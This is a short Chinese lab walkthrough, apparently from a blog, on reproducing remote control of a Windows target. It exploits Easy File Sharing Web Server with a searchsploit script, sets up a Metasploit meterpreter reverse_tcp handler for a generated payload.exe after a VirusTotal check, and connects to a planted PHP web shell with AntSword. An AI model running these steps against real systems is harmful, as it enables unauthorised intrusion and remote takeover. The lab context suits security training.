远程控制复现
2026/5/27 16:17:55 网站建设 项目流程

一、漏洞测试
打开easy file sharing web server

进入后修改端口

点击go可以看到

之后打开kali用searchsploit easy file sharing扫描漏洞

利用对应的Python脚本攻击

攻击完成,说明无法阻挡本身漏洞
二、kali生成被控端和启动主控端
先ifconfig查询kali的ip地址然后生成payload

www.virustotal.com的检测结果

然后启动主控端


然后依次输入1.use exploit/multi/handler
2.set payload windows/meterpreter/reverse_tcp
3.set lhost 目标ip
4.set lport 5000
5.exploit

然后靶机打开payload.exe即可
三、蚁剑控制目标网站
打开phpstudy,启动apache和MySQL

然后生成shell.php

最后打开蚁剑,url地址填http://ip地址(一般为127.0.0.1)/shell.php,连接密码cmd即可

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询